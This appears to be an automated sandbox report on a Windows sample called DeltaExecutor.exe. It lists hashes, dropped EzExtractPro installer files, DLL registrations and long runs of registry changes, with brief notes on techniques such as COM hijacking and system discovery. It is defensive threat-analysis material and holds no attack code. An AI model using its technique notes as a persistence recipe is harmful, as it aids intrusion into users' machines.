Resubmissions
01-01-2025 20:08
250101-yw3eystrcl 801-01-2025 20:04
250101-ytbt8a1qe1 801-01-2025 20:01
250101-yrhvra1pgx 801-01-2025 14:10
250101-rgpf8axnaw 10Analysis
-
max time kernel
244s -
max time network
158s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
01-01-2025 20:04
Static task
static1
Behavioral task
behavioral1
Sample
DeltaExecutor.exe
Resource
win7-20240903-en
General
-
Target
DeltaExecutor.exe
-
Size
169KB
-
MD5
a614a895161a44b174f8b0c5e0d94adf
-
SHA1
1594a374c81ee36ce6dcff56f13169c4400b8714
-
SHA256
d6f67c596a3017fab0f6908f38de0f996fe8742dc7131d491343d128d96564f6
-
SHA512
3e7f9116b528ff8a2aef56f006f8f5c231dcd0fd3e951ce4b3a0582a4429836bcded1469ba7c3ff41d59bafcee05d77150ced675c8b9fe69f17ff734de5ee981
-
SSDEEP
3072:nczkitvo4BpYN/6mBPry8TXROLdW5m4mUR59OOGJ0kA30165M1fSV:nA4NCmBPry/N2lOOYg0kWE
Malware Config
Signatures
-
pid Process 2696 powershell.exe 2696 powershell.exe -
Downloads MZ/PE file
-
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat SearchProtocolHost.exe -
Event Triggered Execution: Component Object Model Hijacking 1 TTPs
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops file in Program Files directory 5 IoCs
description ioc Process File created C:\Program Files (x86)\EzExtractPro\EzExtractProCoreDll.dll EzExtractSetup.exe File created C:\Program Files (x86)\EzExtractPro\EzExtractProShell.dll EzExtractSetup.exe File created C:\Program Files (x86)\EzExtractPro\EzExtractProShell32.dll EzExtractSetup.exe File created C:\Program Files (x86)\EzExtractPro\EzExtractProApp.exe EzExtractSetup.exe File created C:\Program Files (x86)\EzExtractPro\uninstall.exe EzExtractSetup.exe -
Executes dropped EXE 2 IoCs
pid Process 2904 EzExtractSetup.exe 1588 EzExtractProApp.exe -
Loads dropped DLL 16 IoCs
pid Process 2904 EzExtractSetup.exe 2904 EzExtractSetup.exe 2904 EzExtractSetup.exe 2904 EzExtractSetup.exe 2904 EzExtractSetup.exe 2904 EzExtractSetup.exe 2904 EzExtractSetup.exe 2904 EzExtractSetup.exe 2904 EzExtractSetup.exe 2904 EzExtractSetup.exe 2904 EzExtractSetup.exe 1072 regsvr32.exe 1088 regsvr32.exe 348 regsvr32.exe 2904 EzExtractSetup.exe 1588 EzExtractProApp.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IEXPLORE.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IEXPLORE.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language EzExtractSetup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language regsvr32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language regsvr32.exe -
Modifies Internet Explorer Phishing Filter 1 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\PhishingFilter iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\PhishingFilter\ClientSupported_MigrationTime = 00a0706e885cdb01 iexplore.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{A6BAEEC1-C87B-11EF-8778-C60424AAF5E1} = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "3" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = e089dd7d885cdb01 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000008e4578faf7ddef46a11d25319daf68ef000000000200000000001066000000010000200000005ec4757db3effdee9ac00a69eb8514663b8881a7efeff85f41bcc808ff7288b7000000000e800000000200002000000087066857e4be07454b63b8fa9ba90738a5baea78ff48f36d9b32497c39e3286b200000004ad6dbf780f71505de34f9404a358964ac952d821b65a6a6b19186b4f35716f640000000592d909d14844214e708541be1e75cbfec834d6daf81dee03b7c799246dfb6a539f33084cc5c33de7457f6a9776171418e9921e3d73221e8a5472321f022b0d5 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "441923755" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\SearchScopes iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000008e4578faf7ddef46a11d25319daf68ef000000000200000000001066000000010000200000008016b7916b56d1e2b9f31362f4ea4f104b64f9a7c4888360e0fdc52ba1febf59000000000e8000000002000020000000a9e57e8d8b371fb3bf9e45f89de91a94096984116ef61ca09e616231e61a157190000000eb1c30ead6be88b8b58473f0a58ad5020e420ad93923ee8624f433ad86b3c4de21a050fa098072a35832cc98e6aecd05964dda0a5112e56a74ccb57fc4ecbe5d68800cd370d66267922f405d5c53078112c337cebee87000f09ae38bc53a3f4e462df563083ddcfc69c017f0f0b9894f86340fb1d483cc304d59470e85736d6cf236250347c65a9453bf1d711bbd7dbb40000000c94d6e339997e7bea762e813b73a2b0e49112166c464b7fe3a83033d6cff8c5c4e19023eed60dce26be242b5c8dfa6c02b507b456c25a6810709040a1d14c697 iexplore.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{F81B1B56-7613-4EE4-BC05-1FAB5DE5C07E} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 0100000000000000806bdff4885cdb01 SearchProtocolHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32,@elscore.dll,-4 = "Microsoft Simplified Chinese to Traditional Chinese Transliteration" SearchIndexer.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\ActiveMovie SearchFilterHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@C:\Windows\system32\SampleRes.dll,-116 = "Kalimba" SearchProtocolHost.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones SearchIndexer.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 SearchIndexer.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32,@elscore.dll,-6 = "Microsoft Cyrillic to Latin Transliteration" SearchIndexer.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{97E467B4-98C6-4F19-9588-161B7773D6F6} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 0100000000000000e0c932f2885cdb01 SearchProtocolHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" SearchProtocolHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@C:\Windows\system32\notepad.exe,-469 = "Text Document" SearchProtocolHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32,@elscore.dll,-7 = "Microsoft Devanagari to Latin Transliteration" SearchIndexer.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" SearchProtocolHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@C:\Windows\system32\SampleRes.dll,-106 = "Tulips" SearchProtocolHost.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates SearchFilterHost.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\My SearchFilterHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@C:\Program Files\windows journal\journal.exe,-62005 = "Tablet PC" SearchProtocolHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@C:\Windows\system32\SampleRes.dll,-108 = "Penguins" SearchProtocolHost.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Direct3D SearchFilterHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@C:\Windows\System32\ieframe.dll,-913 = "MHTML Document" SearchProtocolHost.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 SearchProtocolHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached SearchProtocolHost.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{993BE281-6695-4BA5-8A2A-7AACBFAAB69E} {0000013A-0000-0000-C000-000000000046} 0xFFFF = 010000000000000000a1b4f1885cdb01 SearchProtocolHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@C:\Windows\system32\SampleRes.dll,-103 = "Hydrangeas" SearchProtocolHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@C:\Windows\system32\SampleRes.dll,-117 = "Maid with the Flaxen Hair" SearchProtocolHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@C:\Windows\system32\MCTRes.dll,-200005 = "Websites for United States" SearchProtocolHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@C:\Windows\System32\ieframe.dll,-12385 = "Favorites Bar" SearchProtocolHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@C:\Windows\system32\MCTRes.dll,-200017 = "GobiernoUSA.gov" SearchProtocolHost.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{E2FB4720-F45F-4A3C-8CB2-2060E12425C3} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 010000000000000060b2e7f2885cdb01 SearchProtocolHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@C:\Windows\system32\SampleRes.dll,-102 = "Desert" SearchProtocolHost.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{1E589E9D-8A8D-46D9-A2F9-E6D4F8161EE9} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 0100000000000000a03155f3885cdb01 SearchProtocolHost.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Direct3D\MostRecentApplication SearchFilterHost.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap SearchIndexer.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32,@elscore.dll,-3 = "Microsoft Traditional Chinese to Simplified Chinese Transliteration" SearchIndexer.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@C:\Windows\eHome\ehepgres.dll,-304 = "Public Recorded TV" SearchProtocolHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@C:\Windows\system32\MCTRes.dll,-200016 = "USA.gov" SearchProtocolHost.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE SearchFilterHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32,@elscore.dll,-5 = "Microsoft Transliteration Engine" SearchIndexer.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32,@elscore.dll,-8 = "Microsoft Malayalam to Latin Transliteration" SearchIndexer.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@C:\Windows\System32\ieframe.dll,-10046 = "Internet Shortcut" SearchProtocolHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit\{4EFE2452-168A-11D1-BC76-00C04FB9453B}\Default MidiOut Device SearchFilterHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@C:\Windows\eHome\ehepgres.dll,-312 = "Sample Media" SearchProtocolHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@C:\Windows\system32\SampleRes.dll,-101 = "Chrysanthemum" SearchProtocolHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Multimedia\ActiveMovie SearchFilterHost.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Multimedia SearchFilterHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32,@elscore.dll,-9 = "Microsoft Bengali to Latin Transliteration" SearchIndexer.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32,@elscore.dll,-1 = "Microsoft Language Detection" SearchIndexer.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@C:\Windows\system32\SampleRes.dll,-142 = "Wildlife" SearchProtocolHost.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft SearchFilterHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@C:\Windows\System32\msxml3r.dll,-2 = "XSL Stylesheet" SearchProtocolHost.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections SearchIndexer.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@C:\Program Files\Common Files\system\wab32res.dll,-10100 = "Contacts" SearchProtocolHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix SearchProtocolHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit SearchFilterHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit\{E0F158E1-CB04-11D0-BD4E-00A0C911CE86}\Default DirectSound Device SearchFilterHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@C:\Windows\system32\SampleRes.dll,-118 = "Sleep Away" SearchProtocolHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32,@elscore.dll,-2 = "Microsoft Script Detection" SearchIndexer.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings SearchProtocolHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@C:\Windows\system32\SampleRes.dll,-107 = "Lighthouse" SearchProtocolHost.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\MPEG2Demultiplexer SearchFilterHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Direct3D\MostRecentApplication SearchFilterHost.exe Key created \REGISTRY\USER\.DEFAULT\Software SearchFilterHost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My SearchFilterHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@C:\Windows\System32\ieframe.dll,-912 = "HTML Document" SearchProtocolHost.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@C:\Windows\System32\msxml3r.dll,-1 = "XML Document" SearchProtocolHost.exe -
Modifies registry class 64 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\.uue regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\.gz\shellex regsvr32.exe Set value (int) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" EzExtractProApp.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\9 EzExtractProApp.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\10 EzExtractProApp.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{C4D98F09-6124-4FE0-9942-826416082DA9} EzExtractProApp.exe Set value (data) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0\0\MRUListEx = ffffffff EzExtractProApp.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\7 EzExtractProApp.exe Key created \REGISTRY\MACHINE\Software\Classes\SystemFileAssociations\.arj\shellex\ContextMenuHandlers\{3D983473-BB31-4609-9F85-3A93CE453FC7} regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\.cab\shellex\ContextMenuHandlers regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\.cab\shellex\ContextMenuHandlers\{3D983473-BB31-4609-9F85-3A93CE453FC7} regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\.uue\shellex\ContextMenuHandlers\{3D983473-BB31-4609-9F85-3A93CE453FC7} regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags EzExtractProApp.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0\1 EzExtractProApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" EzExtractProApp.exe Key created \REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{3D983473-BB31-4609-9F85-3A93CE453FC7} regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\ComDlg EzExtractProApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "4294967295" EzExtractProApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" EzExtractProApp.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\6 EzExtractProApp.exe Set value (data) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 010000000000000002000000030000000500000004000000ffffffff EzExtractProApp.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{3D983473-BB31-4609-9F85-3A93CE453FC7}\ManualSafeSave = "1" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\.jar\shellex\ContextMenuHandlers regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\.lz\shellex regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell EzExtractProApp.exe Set value (data) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000007800000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 EzExtractProApp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\.rar\shellex\ContextMenuHandlers\{3D983473-BB31-4609-9F85-3A93CE453FC7} regsvr32.exe Key created \REGISTRY\MACHINE\Software\Classes\SystemFileAssociations\.iso\shellex\ContextMenuHandlers\{3D983473-BB31-4609-9F85-3A93CE453FC7} regsvr32.exe Set value (data) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000020000000300000001000000ffffffff EzExtractProApp.exe Set value (data) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0\1\MRUListEx = ffffffff EzExtractProApp.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\Shell EzExtractProApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" EzExtractProApp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\.rar\shellex\ContextMenuHandlers regsvr32.exe Set value (str) 